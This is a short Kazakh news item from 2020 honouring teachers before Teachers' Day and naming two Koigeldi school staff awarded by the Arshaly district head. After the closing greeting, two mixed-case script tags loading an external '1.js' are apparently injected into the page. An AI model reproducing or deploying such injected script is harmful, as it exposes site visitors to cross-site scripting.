Ұстаз-ұлағатты есім. Шәкірттерін білім нәрімен сусындатып, тәлім-тәрбие беру,жақсы қасиеттерді бойына дарытып, адамгершілік рухта бағыт-бағдар беруде ұстаздың еңбегі зор. Сондықтан да ол әрдайым қасиетті тұлға ретінде ерекшеленеді. Ұстазға арналған мерекенің адамзаттың даму тарихында қашан да болса алар орны бөлек, жүрек лүпілінен шыққан ұстазға деген құрметіміздің, ізетіміздің жөні басқа екендігін айтып өту керек. Ұстаздар мейрамы қарсаңында Аршалы ауданы әкімі Талғат Қойбағарұлының Алғыс хатымен Қойгелді орта мектебінің ұстаздары да марапатталады. Елеуова Кантчан Карауловна және Отарбай Әділ Дулатұлы марапатқа ие болып, елеулі еңбектің нәтижесін көрді. Әрине, ұжымдағы жемісті жұмыстың да ықпалы зор деп білеміз. Келешектің кемел болуы, ұстаздар қауымына тікелей байланысты. Мерейлі мереке құтты болсын!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.11.2020
Просмотров: 846


Пікір қосу



Деректерді қолтаңбаға қосу